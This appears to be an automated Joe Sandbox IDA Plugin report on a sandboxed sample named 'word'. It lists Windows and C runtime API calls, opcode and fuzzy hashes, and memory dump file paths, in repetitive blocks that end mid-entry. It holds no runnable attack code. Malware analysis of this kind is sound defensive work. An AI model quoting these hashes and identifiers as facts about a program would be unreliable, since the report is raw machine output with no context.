                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                    • Instruction ID: a1f682be926937ece900e9fcc50ccc13891f43ead78ba7c6857800eee9f0599c
                                                                    • Opcode Fuzzy Hash: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                    • Instruction Fuzzy Hash: EC81D2756043009FC310EF65C985B6AB7E4EF84315F008D2EF988AB392D779E909CB96
                                                                    APIs
                                                                    • RegOpenKeyExW.KERNEL32 ref: 0040F132
                                                                    • RegQueryValueExW.KERNEL32(?,?,00000000,00000000,80000001,80000001), ref: 0040F14F
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040F159
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValue
                                                                    • String ID:
                                                                    • API String ID: 3677997916-0
                                                                    • Opcode ID: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                    • Instruction ID: 6acd5c45b0bc896a902747136fbadff1bb775023c46fd22fba7b324c5144c726
                                                                    • Opcode Fuzzy Hash: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                    • Instruction Fuzzy Hash: 60F0BDB0204202ABD614DF54DD88E6BB7F9EF88704F10492DB585D7250D7B4A804CB26
                                                                    APIs
                                                                    • _malloc.LIBCMT ref: 00435278
                                                                      • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                                                      • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                                                      • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                    • _malloc.LIBCMT ref: 00435288
                                                                    • _malloc.LIBCMT ref: 00435298
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: _malloc$AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 680241177-0
                                                                    • Opcode ID: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                                                                    • Instruction ID: 30b75876ff52ae1c35022de4a6700901ba1db26c97f4d16f7fcf584af9a5a73f
                                                                    • Opcode Fuzzy Hash: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                                                                    • Instruction Fuzzy Hash: E5F0A0B1500F0046E660AB3198457C7A2E09B14307F00186FB6855618ADA7C69C4CEAC
                                                                    APIs
                                                                    • __lock.LIBCMT ref: 00411ACE
                                                                      • Part of subcall function 00418407: __mtinitlocknum.LIBCMT ref: 0041841D
                                                                      • Part of subcall function 00418407: __amsg_exit.LIBCMT ref: 00418429
                                                                      • Part of subcall function 00418407: EnterCriticalSection.KERNEL32(?,?,?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001), ref: 00418431
                                                                    • __decode_pointer.LIBCMT ref: 00411AD9
                                                                      • Part of subcall function 004169E9: TlsGetValue.KERNEL32(00411739,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 004169FB
                                                                      • Part of subcall function 004169E9: TlsGetValue.KERNEL32(00000003,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00416A12
                                                                      • Part of subcall function 004169E9: RtlDecodePointer.NTDLL(00411739,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00416A50
                                                                    • __encode_pointer.LIBCMT ref: 00411AE3
                                                                      • Part of subcall function 0041696E: TlsGetValue.KERNEL32(00000000,?,004169E7,00000000,00422F48,00496770,00000000,00000314,?,00418216,00496770,Microsoft Visual C++ Runtime Library,00012010), ref: 00416980
                                                                      • Part of subcall function 0041696E: TlsGetValue.KERNEL32(00000003,?,004169E7,00000000,00422F48,00496770,00000000,00000314,?,00418216,00496770,Microsoft Visual C++ Runtime Library,00012010), ref: 00416997
                                                                      • Part of subcall function 0041696E: RtlEncodePointer.NTDLL(00000000,?,004169E7,00000000,00422F48,00496770,00000000,00000314,?,00418216,00496770,Microsoft Visual C++ Runtime Library,00012010), ref: 004169D5
                                                                      • Part of subcall function 0041832D: LeaveCriticalSection.KERNEL32(?,00413AE5,00000004,00413AD3,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004), ref: 0041833C
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Value$CriticalPointerSection$DecodeEncodeEnterLeave__amsg_exit__decode_pointer__encode_pointer__lock__mtinitlocknum
                                                                    • String ID:
                                                                    • API String ID: 741361212-0
                                                                    • Opcode ID: edb43eca56ef027ac361edaff2b5e89f00094b9356cce8bc8a346a0e55979942
                                                                    • Instruction ID: 38d776d816f70f727deb20f5ce19c96205530670ca88b6e54865c94596e56b2a
                                                                    • Opcode Fuzzy Hash: edb43eca56ef027ac361edaff2b5e89f00094b9356cce8bc8a346a0e55979942
                                                                    • Instruction Fuzzy Hash: B9D05EB1A00318B7CA0037E69C07ADA3E45CB407A8F0604BFFB0857252ED3AC85082DD
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 00401B71
                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                      • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                      • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                      • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Exception@8Throw_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                    • String ID: @EXITCODE
                                                                    • API String ID: 580348202-3436989551
                                                                    • Opcode ID: 212bd09a69672f2bd83738d6ac8f7d7e45adb0f9be888abc46e15aeb72cc087c
                                                                    • Instruction ID: 288ad252d7dad0c090ff8240dee62855692e698d70424b42c0a66861a7771545
                                                                    • Opcode Fuzzy Hash: 212bd09a69672f2bd83738d6ac8f7d7e45adb0f9be888abc46e15aeb72cc087c
                                                                    • Instruction Fuzzy Hash: 73F06DF2A002025BD7649B35DC0276776E4AB44704F18C83EE14AC7791F6BDE8829B15
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0040F00A
                                                                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000004,00000080,00000000), ref: 004299D9
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                    • Instruction ID: 855a981e3d87b0586b227f36a287a9e63fe5cd358b5bfab8de368ff291d46a89
                                                                    • Opcode Fuzzy Hash: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                    • Instruction Fuzzy Hash: 67011D703803107AF2311F28AD5BF5632546B44B24F244B39FBD5BE2E2D2F86885970C
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: __lock_file_memset
                                                                    • String ID:
                                                                    • API String ID: 26237723-0
                                                                    • Opcode ID: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                    • Instruction ID: c8a12bf2a45d0ac11074f8cac28b928f9e20b60047ac9024d749846706a082ab
                                                                    • Opcode Fuzzy Hash: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                    • Instruction Fuzzy Hash: 32012971C00609FBCF22AF65DC029DF3B31AF44714F04815BF82416261D7798AA2DF99
                                                                    APIs
                                                                      • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                      • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                    • __lock_file.LIBCMT ref: 00414EE4
                                                                      • Part of subcall function 00415965: __lock.LIBCMT ref: 0041598A
                                                                    • __fclose_nolock.LIBCMT ref: 00414EEE
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: __decode_pointer__fclose_nolock__getptd_noexit__lock__lock_file
                                                                    • String ID:
                                                                    • API String ID: 717694121-0
                                                                    • Opcode ID: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                                    • Instruction ID: 225a509e04b880138f2478077c57af59103cae2c072c29012e7845c0956b1514
                                                                    • Opcode Fuzzy Hash: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                                    • Instruction Fuzzy Hash: DEF06270D0470499C721BB6A9802ADE7AB0AFC1338F21864FE479A72D1C77C46C29F5D
                                                                    APIs
                                                                    • TranslateMessage.USER32(?), ref: 004098F6
                                                                    • DispatchMessageW.USER32(?), ref: 00409901
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Message$DispatchTranslate
                                                                    • String ID:
                                                                    • API String ID: 1706434739-0
                                                                    • Opcode ID: 743ba5b075e4e96b6aa8f27e888cbbcb244a1ef3297f43ff84cf2107d4412f6a
                                                                    • Instruction ID: 6b3a2aeb923af73eb4cdb1bab797699f2cf27729a5018e8568c19fb4e3feaf67
                                                                    • Opcode Fuzzy Hash: 743ba5b075e4e96b6aa8f27e888cbbcb244a1ef3297f43ff84cf2107d4412f6a
                                                                    • Instruction Fuzzy Hash: D4F05471114301AEDA24DBE58D41B5BB3A8AFD8700F408C2EBA51E61C1FBF8E404C76A
                                                                    APIs
                                                                    • TranslateMessage.USER32(?), ref: 004098F6
                                                                    • DispatchMessageW.USER32(?), ref: 00409901
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Message$DispatchTranslate
                                                                    • String ID:
                                                                    • API String ID: 1706434739-0
                                                                    • Opcode ID: fb629fc6ca96518639a0c0a81923e3da878f7f29ff55e6bd70df59113b88f2fd
                                                                    • Instruction ID: cc4909b6a78c34842ee59a7900970f574117f06624f4f9c7373c79b1fb9dfc76
                                                                    • Opcode Fuzzy Hash: fb629fc6ca96518639a0c0a81923e3da878f7f29ff55e6bd70df59113b88f2fd
                                                                    • Instruction Fuzzy Hash: DDF054B1114301AADA14DBE58D41B5BB3A4AF94740F408C2EBA11E52C1EBFCD504C71A
                                                                    APIs
                                                                    • KiUserCallbackDispatcher.NTDLL(00002000,00000000,0040D89F,00000000,?,?,0040D89F,002F2EB8), ref: 0040F386
                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002,?,0040D89F,002F2EB8), ref: 0040F39E
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CallbackDispatcherInfoParametersSystemUser
                                                                    • String ID:
                                                                    • API String ID: 1232580896-0
                                                                    • Opcode ID: e8c90ec597a1944ae78b7ca20706975efaf7c61f5b7d6b196fc3d6e6037ce03d
                                                                    • Instruction ID: 65e1473dc04fc68897f4a965434dba24c69ef846d3a13abfb0e70c8142ecb83e
                                                                    • Opcode Fuzzy Hash: e8c90ec597a1944ae78b7ca20706975efaf7c61f5b7d6b196fc3d6e6037ce03d
                                                                    • Instruction Fuzzy Hash: F2E0EC727953107AF21486408C46F56A7989B44B11F10C51AB7059B1C1C6F0A840CB95
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 544645111-0
                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                    • Instruction ID: fb1d736feddc8336b94c661b4f3a99b04f66f7614ca83ae43ac4a02a862e88ab
                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                    • Instruction Fuzzy Hash: 1331D574A00105DFC718DF99E490AAAFBA6FB49304B2486A6E409CB751D774EDC1CBC5
                                                                    APIs
                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: ProcWindow
                                                                    • String ID:
                                                                    • API String ID: 181713994-0
                                                                    • Opcode ID: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                    • Instruction ID: 72bdf1ad184d721e15e17473fba0dc1faec6c1a9a9d1f3fcb71c15abd8c9f185
                                                                    • Opcode Fuzzy Hash: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                    • Instruction Fuzzy Hash: FDF05436700118A7DF38995CE89ACFF632AD7ED350F418227FD152B3A6813C5C41966E
                                                                    APIs
                                                                    • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041AA46
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CreateHeap
                                                                    • String ID:
                                                                    • API String ID: 10892065-0
                                                                    • Opcode ID: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                    • Instruction ID: 99ddfbee892492b32903703907324a593b21f4d4a70cf9c354be63060b8faba1
                                                                    • Opcode Fuzzy Hash: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                    • Instruction Fuzzy Hash: 56D05E325543449EDF009F71AC087663FDCE788395F008836BC1CC6150E778C950CA08
                                                                    APIs
                                                                      • Part of subcall function 00444326: SetFilePointerEx.KERNEL32(00000000,00000001,00000000,00000000,00000001), ref: 004442F3
                                                                    • WriteFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00444362
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: File$PointerWrite
                                                                    • String ID:
                                                                    • API String ID: 539440098-0
                                                                    • Opcode ID: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                                                    • Instruction ID: 4a339a6eb5dfef6003722c1615037f540bc53d76d7f4c43935d02bdd90bbdfc9
                                                                    • Opcode Fuzzy Hash: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                                                    • Instruction Fuzzy Hash: 7CE09275104311AFD250DF54D944F9BB3F8AF88714F108D0EF59587241D7B4A9848BA6
                                                                    APIs
                                                                      • Part of subcall function 0041181B: __lock.LIBCMT ref: 0041181D
                                                                    • __onexit_nolock.LIBCMT ref: 004113FD
                                                                      • Part of subcall function 004112FA: __decode_pointer.LIBCMT ref: 00411309
                                                                      • Part of subcall function 004112FA: __decode_pointer.LIBCMT ref: 00411319
                                                                      • Part of subcall function 004112FA: __msize.LIBCMT ref: 00411337
                                                                      • Part of subcall function 004112FA: __realloc_crt.LIBCMT ref: 0041135B
                                                                      • Part of subcall function 004112FA: __realloc_crt.LIBCMT ref: 00411371
                                                                      • Part of subcall function 004112FA: __encode_pointer.LIBCMT ref: 00411383
                                                                      • Part of subcall function 004112FA: __encode_pointer.LIBCMT ref: 00411391
                                                                      • Part of subcall function 004112FA: __encode_pointer.LIBCMT ref: 0041139C
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: __encode_pointer$__decode_pointer__realloc_crt$__lock__msize__onexit_nolock
                                                                    • String ID:
                                                                    • API String ID: 1316407801-0
                                                                    • Opcode ID: d4f7479c18d2f3dc105ebfe0f2eac5810891221413fa193614bbe2c2ae41d224
                                                                    • Instruction ID: 67ef268c6cd115d101ef856db97c2ea624f8e5cc5d3a941a6f1fba9d4c5b72b9
                                                                    • Opcode Fuzzy Hash: d4f7479c18d2f3dc105ebfe0f2eac5810891221413fa193614bbe2c2ae41d224
                                                                    • Instruction Fuzzy Hash: 07D01731901205AACB00FFAAD8067CC76706F04318F20819AB114662E2CB3C46C19A18
                                                                    APIs
                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: ProcWindow
                                                                    • String ID:
                                                                    • API String ID: 181713994-0
                                                                    • Opcode ID: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                    • Instruction ID: 4c36cba44089d0e03573cc5e8dee84df23505be31ebc2729507753268ee0d302
                                                                    • Opcode Fuzzy Hash: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                    • Instruction Fuzzy Hash: C3C08C72100008BB8700DE04EC44CFBB72CEBD8310700C20BBC0586201C230885097A1
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
